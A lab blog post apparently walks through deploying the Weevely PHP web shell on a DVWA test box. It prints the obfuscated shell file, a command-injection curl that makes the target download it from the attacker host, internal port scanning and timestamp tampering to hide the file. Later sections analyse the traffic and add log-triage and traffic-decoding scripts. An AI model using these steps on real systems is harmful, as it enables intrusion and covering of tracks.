In the previous post, I took the opportunity to get a better understanding of web shells. In this post, I'm leveraging Weevely, which ships with Kali. There are lots of other shells, such as China Chopper, C99, etc. However, I chose Weevely out of pure curiosity.
First, generate the PHP file, named webshell.php, with the password "SecurityNik".
┌──(root💀securitynik)-[~]
└─# weevely generate SecurityNik webshell.php
Generated 'webshell.php' with password 'SecurityNik' of 764 byte size.
With the file generated, let's take a look at the code.
┌──(root💀securitynik)-[~]
└─# cat webshell.php
<?php
$E=';for($i[%=0;$i<$[%l[%;){[%for($j=0;([%[%$j<$[%c&&$i<$l);$j++,$i+[%+){$[%o[%.=$t{';
$M='ean();$r=@base[%64[%[%_encode(@x(@gzco[%m[%press($o),$k[%));[%pri[%nt("$p$kh$r[%$kf");}';
$U='$k="[%e4f7[%fb[%5b";$kh="d597f2a[%3139[%[%9";$kf="499ce2[%29[%74f7";$p="Q[%Kdl0d[%L[%yL';
$p='[%et_[%con[%tents("[%php://inpu[%t"),$m)==1) {@ob_s[%tar[%t();@ev[%al(@gzu[%ncomp[%ress(';
$b='@x[%(@base6[%4_dec[%od[%e($[%m[1]),$k[%)));$o=[%@[%ob_get_contents()[%;[%@ob_end[%_[%cl';
$l='rgdCYf[%Q";fu[%nction x($[%t,[%$[%k){$c=strlen($k)[%;[%$l=st[%r[%len[%($t);$o=""';
$B=str_replace('C','','crCCeCaCtCe_fCunction');
$J='$[%i}^$k{$j};}[%}re[%turn[% $o;}i[%f (@preg_m[%atc[%h([%"/$k[%h(.+[%)$kf/[%",@file_g';
$u=str_replace('[%','',$U.$l.$E.$J.$p.$b.$M);
$q=$B('',$u);$q();
?>
Next, I need to get the file onto the target system, leveraging the command injection from before to upload it.
Hosting a web server on my attacking machine.
┌──(root💀securitynik)-[~]
└─# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...
Executing the curl command and reviewing the results ...
┌──(root💀securitynik)-[~]
└─# curl --cookie "security=low; PHPSESSID=knc6aiujikoks8f5vqtuc98uc9" --data "ip=127.0.0.1+%26%26+certutil+-URLcache+-f+http%3A%2F%2F10.0.0.101:443%2Fwebshell.php+main.php+%26%26+dir+main.php&Submit=Submit" --request POST 'http://10.0.0.110/dvwa/vulnerabilities/exec/'
...
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
...
Ping statistics for 127.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
...
CertUtil: -URLCache command completed successfully.
 Volume in drive C has no label.
 Volume Serial Number is 6C10-15EA

 Directory of C:\xampp\htdocs\DVWA\vulnerabilities\exec

09/04/2021  12:01 PM               764 main.php
               1 File(s)            764 bytes
               0 Dir(s)  20,947,238,912 bytes free
With the file uploaded, time to leverage Weevely.
┌──(root💀securitynik)-[~]
└─# weevely http://10.0.0.110/dvwa/vulnerabilities/exec/main.php SecurityNik

[+] weevely 4.0.1

[+] Target:     10.0.0.110
[+] Session:    /home/securitynik/.weevely/sessions/10.0.0.110/main_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely>
Now that the Weevely environment is available, time to leverage some of its features.
SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ :system_info
+--------------------+---------------------------------------------------------------+
| document_root      | C:/xampp/htdocs                                               |
| whoami             |                                                               |
| hostname           | SECURITYNIK-WIN10                                             |
| pwd                | C:\xampp\htdocs\DVWA\vulnerabilities\exec                     |
| open_basedir       |                                                               |
| safe_mode          | False                                                         |
| script             | /dvwa/vulnerabilities/exec/main.php                           |
| script_folder      | C:\xampp\htdocs\DVWA\vulnerabilities\exec                     |
| uname              | Windows NT SECURITYNIK-WIN 10.0 build 18363 (Windows 10) i586 |
| os                 | Windows NT                                                    |
| client_ip          | 10.0.0.101                                                    |
| max_execution_time | 30                                                            |
| php_self           | /dvwa/vulnerabilities/exec/main.php                           |
| dir_sep            | \                                                             |
| php_version        | 7.2.1                                                         |
+--------------------+---------------------------------------------------------------+
SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $
SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ ipconfig

Windows IP Configuration

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::a049:348c:1e6b:6497%9
   IPv4 Address. . . . . . . . . . . : 10.0.0.110
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.0.109
Performing internal reconnaissance via a port scan on 4 different hosts, looking for a couple of common ports.
SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ :net_scan 10.0.0.1,10.0.0.2,10.0.0.101,10.0.0.110 22,80,443,445,8000,9997
Scanning addresses 10.0.0.1-10.0.0.110:22-8000
Scanning addresses 10.0.0.1-10.0.0.110:9997-9997
+-----------------+
| 10.0.0.101:22   |
| 10.0.0.101:8000 |
| 10.0.0.110:80   |
| 10.0.0.110:443  |
| 10.0.0.110:445  |
| 10.0.0.101:9997 |
+-----------------+
Changing the date and time on the "main.php" file to blend in with index.php.
First get the dates and times for the files.
SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ dir
...
02/05/2018  02:45 AM             1,830 index.php
09/04/2021  12:01 PM               764 main.php
...
Modifying and confirming the timestamp on the file.
SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ :file_touch -human-ts "2018-02-05 01:45 AM" main.php
New timestamp: 2018-02-05 02:45:00
SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ dir
...
02/05/2018  02:45 AM             1,830 index.php
02/05/2018  02:45 AM               764 main.php
...
I'm going to leave the rest of the commands at this time, as it seems most of them are for Linux-based web servers. I could be wrong.
Looking at Weevely activity from the perspective of the packets.
First up, what User-Agent did Weevely use?
┌──(root💀securitynik)-[~]
└─# tshark -n -r weevley.pcap -T fields -e http.user_agent | sort | uniq
Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412
We could also have looked in the "access.log" file to get that answer.
Following TCP stream 0 and looking at the payload, we see ...
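As an added example that is not part of the original post, here is a small Python triage script for that access.log route. The log lines below are constructed to mirror what the capture shows (the only value in them taken from this post is the User-Agent string Weevely sent); the heuristic is my own, not Weevely's or the author's: a path that is only ever hit by POSTs with no Referer, from a User-Agent that never requests anything else on the site, is worth a look whether or not the agent string matches a known tool.

```python
import re
from collections import defaultdict

# Apache "combined" log format, which is what XAMPP's access.log uses by default.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# The User-Agent Weevely sent in the tshark output above (an old PowerPC-era Safari string).
WEEVELY_UA = "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412"

# Constructed sample lines (not taken from the post): normal DVWA browsing from a Firefox
# client, plus three shell requests to main.php shaped like the captured streams.
SAMPLE_LOG = """\
10.0.0.101 - - [05/Sep/2021:00:27:40 +0000] "GET /dvwa/vulnerabilities/exec/ HTTP/1.1" 200 4123 "http://10.0.0.110/dvwa/index.php" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
10.0.0.101 - - [05/Sep/2021:00:28:29 +0000] "POST /dvwa/vulnerabilities/exec/main.php HTTP/1.1" 200 60 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412"
10.0.0.101 - - [05/Sep/2021:00:28:29 +0000] "POST /dvwa/vulnerabilities/exec/main.php HTTP/1.1" 200 108 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412"
10.0.0.101 - - [05/Sep/2021:00:28:31 +0000] "POST /dvwa/vulnerabilities/exec/main.php HTTP/1.1" 200 96 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412"
10.0.0.101 - - [05/Sep/2021:00:29:02 +0000] "POST /dvwa/vulnerabilities/exec/ HTTP/1.1" 200 4220 "http://10.0.0.110/dvwa/vulnerabilities/exec/" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
"""


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def find_suspicious_paths(records, min_hits=2):
    """Paths that only ever receive Referer-less POSTs from agents that request nothing else."""
    by_path = defaultdict(list)
    paths_per_ua = defaultdict(set)
    for r in records:
        by_path[r["path"]].append(r)
        paths_per_ua[r["ua"]].add(r["path"])
    findings = []
    for path, recs in by_path.items():
        if len(recs) < min_hits:
            continue
        blind_posts = all(r["method"] == "POST" and r["referer"] == "-" for r in recs)
        uas = {r["ua"] for r in recs}
        agents_only_here = all(paths_per_ua[ua] == {path} for ua in uas)
        if blind_posts and agents_only_here:
            findings.append({
                "path": path,
                "hits": len(recs),
                "clients": sorted({r["ip"] for r in recs}),
                "user_agents": sorted(uas),
                "known_weevely_ua": WEEVELY_UA in uas,
            })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_paths(parse_log(SAMPLE_LOG)):
        print(finding)
```

The script reports main.php once, with three hits from one client and the Weevely agent string; the exec/ page is left alone because it also receives ordinary GETs with a Referer. Matching on the exact agent string is the weakest part of this, since it is trivially changed; the request shape is what survives.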
┌──(root💀securitynik)-[~]
└─# tshark -n -r weevley.pcap -q -z follow,tcp,ascii,0
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 10.0.0.101:40922
Node 1: 10.0.0.110:80
291
POST /dvwa/vulnerabilities/exec/main.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Host: 10.0.0.110
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412
Connection: close
83
A/'Sc(awS|cu$J^cd597f2a31399Hagteqiq4lJQBlcFsdYzYnLpZQc499ce22974f7nS.yn=#|-5>K)[Oi
276
HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 00:28:29 GMT
Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1
X-Powered-By: PHP/7.2.1
Content-Length: 60
Connection: close
Content-Type: text/html; charset=UTF-8
QKdl0dLyLrgdCYfQd597f2a31399HahVAlRTB2VlN2s2Yw==499ce22974f7
===================================================================
While nothing in the request headers really stands out, I have to ask what "A/'Sc(awS|cu$J^cd597f2a31399Hagteqiq4lJQBlcFsdYzYnLpZQc499ce22974f7nS.yn=#|-5>K)[Oi" in the request and "QKdl0dLyLrgdCYfQd597f2a31399HahVAlRTB2VlN2s2Yw==499ce22974f7" in the response are. Those definitely do not look like normal web request and response bodies.
Looking at other streams, I see something very similar to the first stream. Here is stream 3.
┌──(root💀securitynik)-[~]
└─# tshark -n -r weevley.pcap -q -z follow,tcp,ascii,3
===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 3
Node 0: 10.0.0.101:40928
Node 1: 10.0.0.110:80
292
POST /dvwa/vulnerabilities/exec/main.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Content-Length: 227
Host: 10.0.0.110
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412
Connection: close
227
A/'Sc(awS|cu$J^cd597f2a31399HahD+1tp91J1tIeIdFitWsxBzRfwWI1bcUBfpxxb2SOW9UPtnI042tsbWg88dJbZY6Kn8m4Bg2N2qAnAcFzaq/Y4KaleURDC4GTJOEFwPJB1vicFnfXs9POKT6RVeKg3/nozcjO69a67sl/2GY1e2iPGG0jnKOClsJoOCGf1GFA499ce22974f7nS.yn=#|-5>K)[Oi
325
HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 00:28:29 GMT
Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1
X-Powered-By: PHP/7.2.1
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8
QKdl0dLyLrgdCYfd597f2a31399Haht/i43HcxJGi/6Myp7rq7/SWYuqfkpNBxnPcEH02KAPjSkVbEHMTbAHo5mDlBtGA==499ce22974f7
===================================================================
What does the content in the response mean? Time for me to look at the video "Hunting and Dissecting the Weevely Web Shell - Threat Hunting Summit 2016" with Kiel Wadner.
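As an added example that is not part of the original post, the following Python script answers that question using only what is already on this page. The generated webshell.php builds its real source at runtime by stripping the "[%" padding; the cleaned-up source shows the three transforms the shell applies to every message: the payload sits between $kh and $kf, is base64-encoded, XORed against the repeating key $k (the x() function), and gzcompress'd, which is a zlib stream. The script pulls $k, $kh and $kf out of the $U fragment of the generated file and reverses those transforms on the request and response bodies of TCP stream 0. SHELL_FRAGMENT, REQUEST_BODY and RESPONSE_BODY are copied from this post; the function names are mine.

```python
import base64
import re
import zlib

# Fragment $U of the generated webshell.php shown earlier in this post, copied verbatim.
# Weevely sprinkles '[%' through the real source and strips it at runtime with str_replace.
SHELL_FRAGMENT = '$k="[%e4f7[%fb[%5b";$kh="d597f2a[%3139[%[%9";$kf="499ce2[%29[%74f7";$p="Q[%Kdl0d[%L[%yL'

# Request and response bodies of tcp stream 0 from the tshark output above.
REQUEST_BODY = "A/'Sc(awS|cu$J^cd597f2a31399Hagteqiq4lJQBlcFsdYzYnLpZQc499ce22974f7nS.yn=#|-5>K)[Oi"
RESPONSE_BODY = "QKdl0dLyLrgdCYfQd597f2a31399HahVAlRTB2VlN2s2Yw==499ce22974f7"


def recover_parameters(fragment):
    """Undo the '[%' padding and pull out the XOR key ($k) and the two delimiter hashes ($kh, $kf)."""
    clean = fragment.replace("[%", "")
    params = {}
    for name in ("k", "kh", "kf"):
        m = re.search(r"\$" + name + r'="([0-9a-f]+)"', clean)
        if m is None:
            raise ValueError("$" + name + " not found in fragment")
        params[name] = m.group(1)
    return params


def xor_cycle(data, key):
    """Same operation as the shell's x() function: byte-wise XOR against a repeating key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def is_shell_message(body, params):
    """Cheap triage test: a body carrying both delimiter hashes, in order, is a message for this shell."""
    return re.search(re.escape(params["kh"]) + r".+" + re.escape(params["kf"]), body) is not None


def decode_body(body, params):
    """Reverse the shell's encoding: slice out the payload between $kh and $kf, base64-decode, XOR, inflate."""
    m = re.search(re.escape(params["kh"]) + r"(.+)" + re.escape(params["kf"]), body)
    if m is None:
        raise ValueError("delimiters not present: not a message for this shell")
    b64 = m.group(1)
    # PHP's base64_decode tolerates missing '=' padding (the request above carries 27 chars); Python's does not.
    b64 += "=" * (-len(b64) % 4)
    raw = base64.b64decode(b64)
    # gzcompress() in PHP emits a zlib stream, which zlib.decompress() reads directly.
    return zlib.decompress(xor_cycle(raw, params["k"].encode("ascii")))


if __name__ == "__main__":
    p = recover_parameters(SHELL_FRAGMENT)
    print("recovered parameters:", p)
    for label, body in (("request", REQUEST_BODY), ("response", RESPONSE_BODY)):
        if is_shell_message(body, p):
            print(label, "decodes to:", decode_body(body, p))
```

Run against the bodies above, the request inflates to the PHP statement echo(52427); and the response to the string 52427, which is the shell's initial connectivity check. Everything needed to do this came from the shell file itself, so the same extraction works on any Weevely-generated file recovered during an incident; the two 12-character hashes are also the strings to pivot on in proxy or WAF logs, because they travel in clear text in every request and response.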